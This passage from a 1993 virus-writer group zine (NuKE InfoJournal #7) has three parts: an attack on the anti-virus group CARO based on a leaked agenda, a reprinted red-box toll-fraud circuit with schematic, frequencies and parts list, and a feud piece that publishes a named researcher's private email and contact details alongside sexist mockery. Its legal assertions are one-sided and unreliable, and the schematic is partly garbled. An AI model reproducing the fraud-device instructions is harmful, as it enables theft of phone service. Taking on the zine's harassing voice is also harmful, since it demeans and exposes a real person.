     have to be deferred. But maybe Vess and I can do some stuff.

In line eight, we have yet another reference to a person who
could quite possibly be Fridrik Skulason, author of F-PROT.

     11.4 An undertaking from those who want to participate. The 
          disadvantages are that you get to do lots of work, and
          everyone benefits. Your company might not permit this. 
          I suggest we call these CARO members the Weeders.
          Non-weeders don't get the garbage files (why would you
          want them? ), and get the viruses slightly after the
          weeders do.

In line eleven, subsection four, we can see a reference made to
the word "COMPANY."  This seems to substantiate the claim that
the actual companies are involved with the CARO organization.  

We can clearly see that the some members of CARO do work for
companies that may, in the long run, benefit from the efforts of
this organization's findings.  I am concerned that CARO might
possibly become a cartel.  Membership in CARO is restrictive in
nature, which conceivably keep other companies with software
ideas from joining and sharing the same benefits.  Essentially,
this situation could be construed as a barrier to entry under
ideal conditions.  If CARO can manage to encompass all of the
"select" companies, then quite possibly CARO may gain a
monopolistic control over the market. Although there
is one organization that presently holds the majority in market
share, the possibility for a combined effort producing a new
technology exists.  All of us know that this one person must soon
adopt a new method of detection and eradication or his product
produce will quickly become too cumbersome for any practical
use. You think about all the possibilities! 

Moving right along... Let's look at the second definition that I
mentioned earlier in this text.  Collusion!

According to the dictionary definition of the word, collusion
does not always have to imply "illegal" activities, only
deceitful or fraudulent.  With this in mind, take a look at some
of the following excerpts from the "alleged" CARO agenda.

12.  The CARO Virus Collection. I think that it is really
     important that there be no such thing. That way, if people
     ask for it, or claim they have it, then it's nonsense. Can
     we so move - there is no such thing ?

This is self explanatory, but what is all this tripe in the new
set of statements?

5.   CARO Base 
     We need to come to a conclusion. Maybe the weeders (see
     below) are excused from CARO basing, on the basis that they
     are contributing as weeders ? That also gets Vess off that

Okay! So there is a CARO base!

6.   Virus Tagging
     We have a leak somewhere. I'd like to find it, and stop it. 
     So we need to tag the viruses - that's easier than it
     sounds, these days.  Lets decide how.

The "BASE" is obviously a "VIRUS" base!

11.  Sharing the work on collections. I'd like to propose that
     for future collections like Stang's collection, or
     Buchanan's where the main problem is sorting the wheat from
     the chaff, that we divide the work up. You should be
     prepared to:

     11.1 Sort out the viruses from the non-viruses (that's the
          main workload)
     11.2 Isolate the non-viruses (put them in Zip files, marked
          Intended, Innocent and Garbage)
     11.3 Make a replicant of the viruses into a group of Goat
          files (I am willing to donate my little files [ big
          deal]) so that we all have N replicant and the
          original. And a small descriptive text file of the 
          basic info, which is (roughly how it infects, roughly
          what it infects, is it encrypted, is it stealth, is it
          polymorphic).  This is preliminary info, which you'll
          get as a result of replicating the viruses without
          doing any real work. Put this text file, plus the
          replicants, in a Zip, and if we all do some of the
          collection, many hands make light work.  Since the work
          is proportional to the number of files I suggest that
          we divide it on that basis.
          If N people volunteer to be weeders, each one will get
          1/N of the files in the collection. This idea only
          applies to collections that are large and likely to be
          weedful, and I think we should expect more such in

     11.4 An undertaking from those who want to participate.  The
          disadvantages are that you get to do lots of work, and
          everyone benefits. Your company might not permit this. 
          I suggest we call these CARO members the Weeders.
          Non-weeders don't get the garbage files (why would you
          want them? ), and get the viruses slightly after the
          weeders do.

     11.5 Someone to act as a central  coordinator/ collator/
          disseminator.  Vess is the obvious candidate, but he
          might have too much on already.

Again, we're back to square one!  Someone is going to now say
that the CARO Virus Collection doesn't exist, or at least make a
motion to this effect.

12.  The CARO Virus Collection. I think that it is really
     important that there be no such thing. That way, if people
     ask for it, or claim they have it, then it's nonsense. Can 
     we so move - there is no such thing ?

14.   Dinner. Beer. More beer.

...and last but not least, the last line of the "alleged" CARO
agenda.  Having read this article time and time again, I am
convinced that they must have done line fourteen for at least
three days prior to ever discussing line one.

You decide for yourself what these people are doing. I only
wanted to take the opportunity to show it to you the way I see...
Of course, I could be wrong, but as I see it, CARO may be able to
monopolize the industry if they control the mass collection and
can manage to restrict it from those whom the may not "approve."
Couple this with legislation in their favor and the general public
will be in for quite a shock. I dare say we would see any "free"
software any longer. Who works for free? How many people can you
count on one hand that are trying to do something for YOU?
Special thanks to Time Lord of Phalcon/SKISM for snatching the agenda
at the New York conference!

          uK                                                       E-
          E-     "CARO's Undisclosed _Illegal_ Meeting Agenda"     Nu
          Nu                       PART 2                          KE
          KE                                                       -N
          -N                         By                            uK
          uK                    Rock Steady                        E-
          E-                                                       Nu
NuKE InfoJournal #7
August 1993

% I've Been Watching You For A La-La-La-La-Long,
                              A La-La-La-La-LONG, Long Time %

% Amendment Seven of the CARO Meeting Agenda %

7.   Proposed action against organised virus writing groups -
     working group to be formed, I suggest, with 2/3 US members
     (Glenn, Joe, Ross?), 1/2 Euros. It's mostly a US problem,
     now that ARCV have gone :-).  

     We should set up a Murky Database (Handles, BBSes, Names,
     Addresses.)  The objective is to get a police prosecution
     against anyone who is committing a crime (but not, of 
     course, against anyone who is not committing a crime)

I've read this paragraph several times over, and I just cannot believe the
filth in it. This above paragraph is certainly illegal, according to Canadian
and American law. This above paragraph goes against the Privacy Act.

I've looked at American, Canadian, English and Australian law concerning 
about the Privacy Act(s). In Quebec (a province of Canada) we have adopted
Law 68 this spring. The law restricts/forbids the sale of lists, that
private companies have collected and stored. It gives Quebecers the right
to see information about them, that private companies have collected and 
stored. It also reserves the right to database compilation lists to 
governmental agencies ONLY!

However, CARO does not have any right whatsoever to create a database
to begin with, because it has no relation to those on the database. A 
magazine company can have the right to create a database on its 
subscribers, as it is needed to send out their product. CARO's database is
not composed of their clientele, it has no relation to those on its database.
CARO is acting like a law-abiding body, which it IS NOT. CARO intends to 
compile a database of those "committing" a crime! 

ONLY, and I repeat, ONLY government agencies can compile a list of
"criminals." But those on that list have been formally charged and tried
in a court of law. These government agencies have the right to say that
those on the list are criminals. But CARO is not a government agency,
it does not hold the power of jurisdiction on anyone or anywhere! CARO
can be charged for a conspiracy simply be compiling this list! 

One has to understand that organized _virus_ groups, such as NuKE, are
rightfully legal. The law does not restrict the production of viral 
code, the law CAN NEVER restrict the production of viral code, it would simply
be UNCONSTITUTIONAL if such a law were made. It's plain dumb, and we at NuKE
laugh at those like CARO, out to create such ridiculous law(s). One
also has to understand that _no_one_ can restrict what an individual does
in his/her personal computer. As long as it is in the privacy of their own 
personal computer, and it does not affect anyone _directly_, you can do 
whatever pleases thy soul.

And if people wish to share amongst themselves any new viral code, they can! 
See, if the two parties agree in sharing viral code, no law has been broken.
Those that call a NuKE BBS (such as Cybernetic Violence) and request
virus base access are granted access upon validation. This too is legal!
Once you answer "yes" to the question of viral access, you have taken upon
the responsibility of receiving any virus. See both parties agreed on sharing
viral code, therefore neither of the parties were malinformed about the
viral sharing, and it does not affect anyone directly! Therefore this act 
is legal according to law. 

When is the law broken? Within NuKE this doesn't seem to occur, but lets look
at CARO, shall we...

Gathering information like a person's true name and address is enough for
CARO to break the law. People have a right to privacy, and once that right
has been taken away by some dimwit at CARO, once your right to privacy has
been raped from you, you can file suit for damages. In this situation, both
parties, (CARO and the person on the CARO list) did _not_ come to any
agreement what so ever, to be included in such a list. Also the CARO's list
implies that those on this list are law-breakers, criminals, bottom-of-the-food
-chain fungus. This is a great basis for suing for damages. You also have to
understand that CARO is NOT a governing body! Therefore CARO has _no right_ to
judge who is a criminal and who is not a criminal, as it does not hold the
power of the law. Therefore CARO can _never_ compile a list of virus writers
to be submitted for prosecution under legal boundaries.

The _fact_ of this database is so controversial, that we very well can see
a conspiracy in the making here. How is that? Well, HOW exact is this 
database that CARO is compiling, what methods are they using to collect
this information? Are they trying to bond an Alias to a body? If CARO
has reason to believe that "Rock Steady" is the blame for some criminal
acts, who is to blame? Are we going to _presume_ that Joseph Greco is
Rock Steady? What are the implications of this, if it were true? Does Joseph
Greco contain any legal documents that tie him to the name Rock Steady? How
are you going to prove this? Also, how clear is he tied to the crime? Is the
crime the result of a computer virus created by Rock Steady? If that is the
case then for every murder resulting from a gun we should charge the
manufacturer of the gun, too! Oh how moronic, only someone belonging to CARO
could come up with such a rule.

I can scream out all day that Joseph Greco is Rock Steady, it still is not
valid in court. Information like that is invalid because it can be easily
replicated by anyone, it is not authentic like a signature or handwriting
style. But what is needed to get a prosecution is _not_ the fact that Joseph
Greco used the name Rock Steady, or the fact that Joseph Greco IS Rock Steady
for that fact, but that Joseph Greco was the one to commit the criminal act!
And it is _extremely_ difficult to proof that. Because you really need to be
110% sure that Joseph Greco committed the crime, and the only way to do that
is to convict him at the moment of the crime. Which is fairly impossible to do,
round the clock surveillance is required, which of course would require a

The legal system is an amazing system at work, and all that is needed to 
throw out a charge is one doubt. The legal system has to prove that you
committed that criminal act, _without_ any reasonable doubt. I've raised
several reasonable doubts, and can continue throwing them at you till I

Statistic show that, of all computer criminal charges laid, only 25% (figures
were extracted from Statistic Canada, and relate to Canada computer crimes only)
have been found guilty. Of course we need to "trim" the figures to reflect 
virus and security related criminal acts. In turn less then 5% would be the 
result of virus and computer security acts. In 1991 operation Sundevil began
in the USA, which was conducted by the Secret Service; in turn, 50 arrests
were made, 200 computers and 50,000 diskettes were confiscated, and the
only charge to be brought to court was for the result of the E911 article
that was published in Phrack Magazine. In result the editor of the Phrack
magazine responsible for the article pleaded GUILTY, and yet found to be
not guilty as charges were dropped. 

Steve Jackson Games filed a suit against the Secret Service for the illegal
confiscation of their computers and the damages caused by the Secret Service.
The Secret Service in turn was found guilty, and Steve Jackson was awarded
US$100,000.00 in damages. Therefore in fact, operation Sundevil was perhaps
the biggest flop ever to be conducted by the Secret Service, which lasted a
complete year, where salaries were being paid for hundreds of men, and in
result thousands of dollars loss in legal fees and a charge against them
which cost US$100,000.00, and every penny of operation Sundevil was from
taxpayer's money. Hard earned money of every day taxpayers like you and me,
that busted their hump earning each penny.

We are being raped by technology-driven companies, such as closed-circuit
television and electronic access cards used to monitor workers in offices.
Personal communications devices, which are changing how we use a telephone,
would be assigned to people, not fixed locations; that would make it possible
for the phone company to know where the caller and recipient were when a call 
was made. These are security problems associated with cellular phones.

Hopefully one can understand where all this can possible lead to. We are 
entitled to data-protection rights! Personal information should be collected
only where warranted, and use of it and access to it should be subject
to tight controls. 

After reading this article, many of you might well be tempted to crawl into
your bed and pull the cover over your head. But that would be to succumb 
to the "technological trance." Instead all of us should become _more_
vigilant, and press harder for our rights.

                            Rock Steady/NuKE
          uK                                                       E-
          E-                 "Toll Fraud Device"                   Nu
          Nu                                                       KE
          KE                      Typed By                         -N
          -N                                                       uK
          uK                     Rock Steady                       E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

I typed up the following article entitled simply "Toll Fraud Device" from
the Summer 1993 (vol. 10, no. 2) issue of 2600 Magazine.  The article is
uncredited in 2600, so we're not quite sure who to thank...  Anyhow, since
we've done articles about red boxing in the past and have received tremendous
response, we thought our readers would like to see a great new optimized
design for a red box.  Enjoy!

                            Rock Steady/NuKE


% Toll Fraud Device %

We at 2600 are often asked, "What is a toll fraud device?" Well, we decided
to answer the question once and for all. This red box is a toll fraud device.
Why is it a toll fraud device? Because any red box that can be built this
cheaply and this easily and can fit in the palm of your hand was clearly
_not_ made for demonstration purposes.

Okay, so what is a red box? Well... a red box is hacker slang for any device
that simulates payphone coin signalling tones in North American payphones.
Red boxes emit the precise tones used by payphones to tell the local switch
that the appropriate coinage has been inserted. The tones are played through
the mouthpiece in lieu of dropping coins into the payphone. This particular
red box is particularly fraudulent in that it only simulates quarter tones.
After all, when one commits toll fraud one does not want to waste time
pumping virtual nickels and dimes into the payphone when quarters work quite
nicely thank you.

For those of you who are technically minded, the theory behind the circuit is
easy enough to grasp. The DTMF encoder (U1) used in conjuction with the
crystal (X1) produces the desired frequencies. The decode counter (U2)
controls the cadence or how many frequency pulses are used. The 555 timer (U3)
used in conjunction with R1, R2, and C1 produces the actual pulses and controls
how fast they are delivered. The circuit is a good hack because it utilizes
the carry flag on U2 to overcome any stray charge on C1 that may cause the
first pulse from U3 to be inaccurate. It accomplishes this by ignoring the
first five pulses produced by U3, processing the next five, ignoring the
third, processing the fourth, ignoring the fifth, etc... The circuit is also
a good hack because it utilizes that well known coincidence in the DTMF
encoderm, the fact that substituting a 6.5 Mhz crystal for a colorburst
crystal (3.579545 Mhz) just happens to raise the "*" key frequencies from
941 and 1209 Hz to approximately 1708 and 2195 Hz. Since the desired
frequencies for a quarter tone are 1700 and 2200 Hz, the output of the
cicuit is well within tolerance. The cadence is determined by the RC
combination in U3. Each pulse lasts approximately 30ms, followed by 30ms
of silence.

So fraudulent is this red box that we at 2600 have nicknamed it the Quarter.
While all members of 2600 [and NuKE -RS] are morally righteous, and do not
advocate the use of red boxes for fraudulent purposes, we must admit that if
we ever did decide to commit toll fraud, we would trust nothing less than
a Quarter to do the job.

Obviously, the Quarter will not work with Customer Owned Coin Operated
(COCOT) payphones. You may also have some difficulty with newer
electronic payphones, as the phones companies are finally getting hip to
these little devices and are isolating the talk path from the receiver until
the call is established. Still, your Quarter should provide you with hours
of fun-filled listening entertainment. In a world where a one minute payphone
call from Washington DC to New York costs $2.20 (at the maximum discount rate
no less!) it will hardly surprise us at our suburban offices if, while sipping
ou afternoon tea, we happen to read about a sudden proliferation of Quarters
across the U.S.

                  V+                 V+
                  ?                  ?
                  ?                  ????????????
               ????????          ??????????     \
               ?  1   ?          ?   16   ?     /R3
       ?\???????16   3????????????12      ?     \
   SPKR? ?     ?  U1  ?          ?   U2   ?     /
       ?/???????6   11????????????14    15???????
         ?     ? 7  8 ? ?        ? 13   6 ?     ?
       ?????   ???????? ?        ??????????     ?
        ???      ?  ?   ?                       ?
         ?     X1????   ?                       ?
                        ?R1 R2                  ?
                 ????????/\/\/????????          ?
                 ?      ?     ?      ?          ?
                 ?    ???????????    ?          ?
          V+     ?    ? 3     6 ?    ?          ?
          ?      ?    ?        2??????          ?
          ?????????????8        ?   ???         ???? \??????
                 ?    ?    U3   ?   ??? C1      ?   S1     ?
                 ?    ?         ?    ?          ?        ?????
                 ??????4       1?????????????????         ???
                      ???????????                          ?

NOTE: All crossed lines on the diagram are points of connection.


R1            220 kOhms     The exact values of R1 & R2 are not
R2            220 kOhms     important so long as their sum is 440.
R3              1 kOhms

C1            0.1 uF

X1            6.5 MHz       6.5536 MHz is also within tolerance.

CHIPS(IC)     NAME          NOTES
U1            TCM5089       DTMF encoder
U2            74HC4017      Decade counter. Regular 4017 is okay.
U3            CMOS 555      Timer IC. Regular 555 is okay if a 1
                            kOhm resistor is inserted between pins
                            3 and 8.

SPKR          600 ohms      U1 expects an equivalent load.

SWITCH        TYPE          NOTES
S1            Momentary     You may also want to add a power switch.

As printed the circuit expects three triple 'A' batteries for a total of 4.5
volts. A 9 volt battery may also be used, but R1 and R2 should then total
470 kOhms instead of 440. Obviously, you will need a perfboard and chassis if
you expect to build the circuit.  Parts may be ordered from electronics firms.
Remember to order at least two of everything so that you will have spares in
case you mess up.
          uK                                                       E-
          E-   "To sara gordon Or Not To sara gordon, That Is      Nu
          Nu                    The Question"                      KE
          KE                                                       -N
          -N                         By                            uK
          uK                     Rock Steady                       E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% To sara gordon Or Not To sara gordon, That Is The Question %

In a previous NuKE Informational Journal (#6), we had published an editorial
by Rock Steady concerning the "know-about" and experiences that Rock Steady
has encountered with Ms. Sara Gordon. To our surprise [yeah, right], Ms.
Gordon denied several statements we had written about her, so we at
NuKE asked Sara to write us a response pertaining to that article so we
could publish it in the upcoming InfoJournal.

What you are about to read is the actual letter Ms. Gordon send us, untouched
and unedited. The reason for this is so that Miss Gordon can comprehend that
we in NuKE have no intention to bad-mouth anyone, nor will we let our emotional
judgement cloud our writing. This "Information Journal" *is* factual hard-core
information, and nothing less.

I want you to read the following two captures. One is the reply from Ms.
Gordon. The second is a _private_ reply from Ms. Gordon to John Buchanan

All sentences beginning with ">" are quotes from the original article in the
previous IJ. The rest are Ms. Gordon's comments (and her vivid imagination).
All sentences in brackets are comments by Rock Steady and NuKE.

% Capture #1 -- Sara Gordon's Official Reply to NuKE %

i've been sent your6 info journal (not by one of your own people this time),
and wanted to comment on something in it:
the comments are both to you and to the fellow who wrote these quotations:

>Get the picture? Yes, we all heard it before, I'm a deranged lair. The Anti-
>Virus community is _not_ maniacal to associate themselves with us. We all
>heard of Sara Gordon screaming out, `I never called an underground exchange
>board', she will never admit it. Nevertheless Sara Gordon holds the phone

i do not say i have never called an underground exchange board. why, in
our conversation last night i told you i -have- call them, to talk to the
sysops and virus authors. i have called on at least 10 of them (not many,
i know), that deal strictly with viruses. some in u.s.a., some not. i don't
upload viruses to them. i don't call them to 'spy' on what is going on there.
usually i call if i'm invited. i've talked about calling them in several
articles. why would you think i would deny this.

[10 times? 10 to what power? Don't upload viruses to them?! But you do upload
 viruses to the so-called AV, right? The AV is the cause of all the viruses
 out there, not us.]

and i don't scream. thats the radish's job. and, i use my real name when i
am the one calling. why, sometimes even other people call using my real
name :).

[You don't scream? Hmm, you sound calm enough -- I wondered what happened
 in the next capture!]

however, if by association, you mean, do i do the same things you do, the
answer is i do not; at least, i don't write and distribute computer viruses,
or hacking/phreaking/carding information.

[True, we don't harass people, or try to "double-dare" them to do vengeful
 acts for you. What's this now, you DON'T distribute computer viruses? Not
 even to the AV? Come on you know that _is_ a lie. Sara, we _don't_ suspect
 you of distributing viruses, we _KNOW_ you  do. It's been proven by our
 receiving of viruses... If you must lie, please make them more believable,
 put in some statistics in 'em sentences, at least it'll be partially right.]

>number of Cybernetic Violence, Black Axes, The Hell Pit, etc. Sara doesn't

of course i've called black axis. or it is axes now? and, i've talked to 
kato at the hell pit a few times. voice, even, after the ridiculous phrack
article. i think its been over a year now though since i've called him,
or he has called me.

[I know you have. I also know your "Dark Avenger article" was the best scam
 ever. ]<0oL YoU'r? ?0w ?N? 0f ?s!]

ive never called cybernetic violence that i can remember, i think i -may-
have it in an overhead slide for a presentation, but i've not called it.

i told you this last night. 'holds the phone number of'...gee, so does the
phone company. and probably every law enforcement agency in the world.

[Gee, Sara, but you seem so damn proud to tell people that you hold the

>associate herself with low-lives like ourselves, as she explains. Nevertheless
>she has CLAIMED to have called up The Hell Pit BBS, and uploaded 3 fake viruses
>and exclaims how easy it was to obtain virus access there. Now there's a 

wait. what exactly are you talking about here? can you please explain

[Oops, memory lapse!]

this? it -is- easy to obtain access there. and yes, three dummy viruses were
uploaded there to prove this point. it was a (very small) part of some
research data gathered to illustrate that the real problem of virus exchange
bbs was not the -viruses- but was the attitudes being presented and tossed
about. why, screaming radish, you agreed with me just last night on the 
phone (when you called me) that a lot of those people are putting out 
attitudes that -are- the problem.

[Our point exactly, and now your stealing our ideologies. You seem nice and
 calm in this message, but that is because you _know_ that this article
 was to be published, but what about articles you don't expect published?
 Are you this well-bred in them? I think not, as we reveal your private
 e-mail in the next capture.  BTW, any security flaws at the Hell Pit have
 been fixed long ago...there's no way she could get in now without a real

as far as not associating with what you call 'low lives like ourselves',
don't be silly. i never said i dont associate with anyone, i don't call
virus exchange bbs and upload computer viruses, because i think that once
i would let a virus out of my control, i would have done an irresponsible

[You didn't seem so distressed by helping to distribution of NED amongst
 the AV. Remember the AV _are not_ better than us. They are not above the
 law, and they don't have "better" morals then we do. They _think_ they
 do, but deep down its that money they wants. And they'll do whatever it
 takes to get it! Hmmm, capitalism, ain't it charm. Then you wonder why we
 wish to be anonymous, we have lives...]

i've never called anyone a low life that i can recall. you are that one who 
keeps using that term regarding yourself. i know only a small portion of your
lives, and wouldn't begin to judge you. i only say that certain actions
of virus writers are irresponsible; those actions i can judge because i've
seen the consequences of them

[You can't recall? Humms, memory lapse (again), common in elderly women,
 isn't it?]

>contradiction.  Now who are you going to believe?  Rock Steady, with a record for
>hacking, and suspected of other cyber-crimes, or Sara Gordon with not even a
>bug-stain on her record?  Wait, let me tell you some more.  Sara Gordon is not
>totally `white', since Sara doesn't associate herself with `us', I guess the
>conversation we had concerning her wanting to invite a person called `Nowhere
>Man' to dinner was a figment of my imagination.  Also, the crap she said to me,

of course i associate with you.  why would you ever think i would say i
don't.  i did want to invite nowhere man to dinner.  why not?  ive had
dinner with far more proficient virus writers and hackers than him
:) seriously, why would you think i would be 'ashamed' of this?

[WAIT! Now you associate with me? This memory lapse thing is much more
 serious than I thought! A word of advice when lying, Sara, try sticking to
 ONE and ONLY ONE fabrication, don't start combining it with memory lapse
 and then other stories. Hell, why would you be ashamed of associating
 yourself with me. I _can't_ think of any reason!?! This associating
 think scares me, I think its time NuKE chips in and gets you a man,
 unless of course that isn't your preference! (No offence intended.)]

[Well, Sara, name those "more proficient virus writers" you've "eaten" (69?)
with.  Perhaps your sweetheart, Dark Avenger?  I can see it now, a bottle of
wine, some roses, that charming Slavic accent...head over heels I tell you.
See Rock, she is straight, after all!  BTW, I have never claimed to be a
hacker.  I am not a hacker, and I resent being associated with hacking, which
is an (wrongfully) illegal activity in most areas, whereas virus writing is
not -- and I don't support illegal activities.  I dunno, I bet her memory
problems is caused by some new virus from Bulgaria...a sexually transmitted
one. :-)  -NM]
i don't know what your problem is with me.  i run a free bbs to give out
information on viruses and security.  i write articles that bring the
positions of both sides into the public eye.

[You bring the positions of both sides? Right...]

im really quite tired of being quoted for things ive never said.  get
this straight--i do not find any problem with writing a computer virus.

[Uh-oh, that memory problem again...]

it's code.  what is the problem, at least as i see it, is the
irresponsible act of letting that code out of your control.  as i said
to SR, if you let people d/l viruses from your bbs, you are helping to
increase the problem.  you're helping to add to the already shaking
trust situation that exists out there.  well, since your last journal said
this is your goal, to eliminate every last piece of user trust in anti-virus
software (you specified frisk and mcafee, i think), i guess you are
accomplishing your goal.  congratulations.  personally, i think its
irresponsible, and not only that, you are helping some of the
anti virus product developers who do prey on the same fears to keep
right on taking advantage of the innocent users.

[So what are you going to do? Outlaw Viruses to "regular" people? And only
 AVers will be able to hold virus collections? That's almost like racism. What
 makes you better than us? We do this for the intellectual challenge, we don't
 seek money, we only teach those that wish to be taught! We also teach
 awareness, truth, reality. At least we agree about the anti-virus makers,
 making big bucks from this. But we can't bluntly make a law that is "racist,"
 you don't have to be from different ethnic groups to inflict racism you know.]

>about getting her in contact with virus writers in Australia, was a figment
>of my vivid imagination.  Come on Sara, I heard it and you said it.  Of course,
>this is simply my word against yours.  Son of a gun Sara, didn't you hear all
>them `clicking' noises during our conversation?  There was someone else on the
>line Sara!  Someone, that kept on receiving calls, and therefore he/she had to
>switch and answer the call, via MaBells `Calling Waiting' service.

oh, you recorded the calls?  i don't have call waiting, and i don't care
if whoever listens to your calls listens to mine.  yes, of course i said
it.  and yes, of course i wanted to get in contact with talon (harry
mcbungus, terminator zed, et.al).  i talk to a lot of virus writers, and
hackers.  what makes you think i would deny this?  i would not deny this
any more than i have publicly stated the errors i made when i first got
involved in the fun world of computer viruses.  i've never tried to hide
any of this.  in fact, ive had it published, in major publications, as
well as conference proceedings.  why do you think i'd try to hide my
contact with anyone?

[Of course you don't hide from contacting virus writers, it gets you alot of
 coverage, humm 4 straight issues of VNI, nice. I'm quite sure you got those
 articles laminated in wood, right? But what _measures_ will you _seek_ to 
 endure in these contacts. That is the question at stake, Sara.]

>See I guess this isn't after all, just a figment of my imagination. Since I
>conference the call, my phone bill supports the fact that TWO calls were made
>at the same time from my number!  One was to the alleged person in the
>background while the other was yours!  (Sara)

must be.  i don't exactly understand what you are talking about, but i
guess you do.  i figured you were conferencing.  hope you paid for it.
by the way, why did you try to tell me you were talon?  your accent is
definitively from montreal.

[Don't understand? Instead of memory lapse, you now conclude that you don't
 have an adequate grasp of the English language? Nice One! Hope I _paid_
 for it?! You think I'd risk calling anyone up fraudantly? That's _illegal_
 Sara, I'm sure I got tons of officials "expecting" me to do just that so
 they may get rid of me for good. Uh-uh girl, I wouldn't give anybody a
 second in the day to catch me in any illegal activity.]

its pretty rude to allow other people to listen in to conversations;
most adults wouldn't do it.  do you think its just normal and acceptable
to do it?  i don't.  however, i would not have 'denied' any inviting of
virus writers to dinner or elsewhere even if you didn't have some
'proof'.  i've clearly stated, in publication (see this months personal
computer world u.k.)  that i talk with a LOT of virus writers.

[Pretty rude? It's my word against yours. This way I got someone backing me up
 on your side. Don't expect CARO membership just yet, girl.]

>Oh yes, I'm a bored teenager derange liar wanting to bust balls. Frankly, no one
>admitted in NuKE is a teenager.  Frankly I'm currently in a respectable banking
>position, nevertheless I still am pursuing my Masters in Mathematics, and may
>this even lead to a Ph.D., of course by then I'm expected to sprout out of my
>satanic puberty stage and into adulthood.  Even though I'm way passed the legal
>adult age, may you still say its a hormone thing.  Frankly, when just is not done
>and lies are tossed over to the public, discrediting our history, with your
>influence of power.  <Yes, corruption of power> Until that day of just, until
>that day of truth comes out, then that will be the day you will get rid of me.

no one admitted in NuKe is a teenager?  better check those birth certificates...

[Lemme guess, its a _reading_ problem now? Flash me yours and I'll show you
 mine <wink, wink>.  Uh, birth certificates, I mean.]

>You see this isn't about me, this is about the you.  <The AntiVirus community>
>This isn't something you `mature out of', when do you mature out of injustice?
>In what point of life is injustice okay?

it's not ever okay.

>The Virus problem has been solved, now what about the Anti-Virus Problem?

okay, so after our talk last night i had a few ideas i wanted to talk
about with you, but if -this- is the kind of thing you are going to
print, i think probably you don't want to hear what i have to say.  i
think it seems you would rather print things you imagine.

[Trust me, if -this- is your kind of attitude, take a walk sister. No fame
 coming to you from our direction...]

SGordon@Dockmaster.ncsc.mil / vfr@netcom.com         bbs:    219-273-2431
fidonet 1:227/190 / virnet 9:10/0  p.o. box 11417    south bend, in 46624
the villian goes to jail, the hero goes free. i wish it were that simple for me.
@Via RTrk 3:632/998@fidonet, Jun 25 1993 at 02:24

%  Capture #2 -- The Juicy Part %

In the following capture from Sara Gordon, who hot-bloodedly tried to
shoot NuKE down due to our gain of public support Ms. Gordon still likes
to imagine that NuKE is a bunch of hackers intent on viral destruction. This
is as spurious as you can get, NuKE is a publicly available organization.
Anyone is free to call up our systems and request access. We have nothing to
hide, all is open. We wish to communicate with the public to a great extent.
This also is an invitation for people in ALL walks of life who may speculate
about NuKE to simply call us up! I cannot talk on behalf of every NuKENet BBS
out there, as I cannot control them, but I can speak for myself, and I invite
anyone to call the World Headquarters of NuKE, Cybernetic Violence,
+1 514 426 9194. We feature a 14.4k v.32bis US-Robotics modem, and also have
Bluewave mail installed into our BBS so that you may download/upload all
messages without having to stay online reading messages. As we too understand
that time is costly over the phone lines...

 * Originally by Sara Gordon, 1:227/190
 * Originally to John Buchanan, 1:271/297
 * Originally dated 24 Jul 1993, 11:35

 * Original: FROM: Sara Gordon
 * Original: TO:   John Buchanan
 * Original: AREA: <V>_Local

 * Forwarded by Sara Gordon
 * Forwarded Using QuickBBS 2.76
 * Forwarded at 11:40 on 24-Jul-93

 In a message to Sara Gordon <07-24-93 10:29> John Buchanan wrote:

 JB> Sara,
 JB> I guess what makes me so cotton-pickin mad about the AV are posts
 JB> like what I saw you direct towards me. The "ENTIRE" set of NUKE echoes

 i only responded to a statement you made that is incorrect.

 JB> are open to the public, yet you choose to imply they are private.

 they are not open to the public. i don't imply it. i state it quite clearly.
 so, then you will be fwding the pertinent posts to the public? i bet.
 would you like me to do it for you? c'mon john. you don't expect me to believe
 that i will have access to those echos if i call you bbs? -all- of them? ok,
 lets see. you tell me i will, and ill call and check it out.

[Notice the different attitude expressed by Miss Gordon, when she _doesn't_
 expect anyone to be reading private Netmail! Notice the hot-blooded tone
 of voice. Notice how she double dares Mr Buchanan ("c'mon john"), insinuating
 that John is afraid to post it to the public that NuKENet is available to
 anyone, which it is! As long you support NuKE ideologies, and respect what
 people have to say, then NuKENet can be easily obtained for your BBS.
 Actually I _double dare_ Ms. Gordon to pick up NuKENet and make it
 publicly available to her users! I guarantee she won't "lower herself to
 our level"!]

 JB> Also, you state that they carry posts concerning PBXing and such. To
 JB> my knowledge and extent of control, they do not exist and should they

 you know they do. and you know that i know it. so lets stop playing around,
 at least have the decency to be honest about it.

[What a <CENSORED>! She will not stop screaming! In the past, we have plucked
 out any system on NuKENet that posts any illegal material, such as PBXs!
 (Just in case Miss Gordon wonders what "illegal material" means to us.) Today,
 we still stand on that same agreement and we are happy to report that no
 such posts has made itself known on NuKENet! Sara claims she has many,
 many people that capture messages from NuKENet and bring them to her.
 Yet she has NEVER had any real proof of her phoney statement. Let's just
 face it, Sara's a FAKE!]

 JB> maker their appearance, I take EVERY action available to me to either
 JB> squelch them or cut them off at the source. It really rips my tail
 JB> when people in your position abuse the "language" of professionals

 oh please, if you make every effort to cut it off then why is it so blatantly
 still there, repeatedly? im not in any 'position'. im just a normal person
 who lives in the cyberspace, and who is sick of seeing it get all screwed up.

[Notice the attitude once more. She REFUSES to hear us out! We at NuKE under-
 stand, and have the dignity to respect any opinion Miss Gordon has to say,
 right or wrong, we have even published her reply to our previous NuKE IJ
 article, unedited! Yet, she refuses to hear us out, personally she seems to
 express a hatred towards us. And no matter what we do, Miss Gordon will
 always detest us. She complains that "virus writers" show utter hatred towards
 her. I guess they saw the _real_ Ms. Gordon, as we are witnessing in this
 private e-mail.]

 JB> You wonder why I do the way I do in the echos. Nothing I post about
 JB> the AV is made up in fabrication sessions. I try to inform the
 JB> general public about their involvement in the virus exchange arena
 JB> and the underlying motives in this issue of legislation. Why not take
 JB> a different stand and research what I say? If it ok by you, I will

i have researched what you say, john. and what you do. what you post is made
up in some cases. you want me to quote it for you? forget it. im finished
trying to help a bunch of people who want to destroy what is precious to me,
and to a lot of other people.

[No, Miss Gordon, it is _we_ whom have researched you. And not only did we not
 buy your first reply, according to the reply of NuKE IJ #6 article (that
 first reply was unbelievably bogus, as it didn't express _any_ of your 
 _real_ opinions, it only expressed the opinions you wanted the public to
 behold), nevertheless we see the true Miss Gordon here, don't we?]

if you want to talk about underlying motives of legislation, you are looking
in the wrong place, john. its the virus d00dz like nowhere man, and the rest
of the 'cute named guys (and gals) like 'pure energy', and that whole bunch
that brought this down on us. not any anti-virus 'cartel' or that other
nonsense you are talking about.

[And now she insults us!]

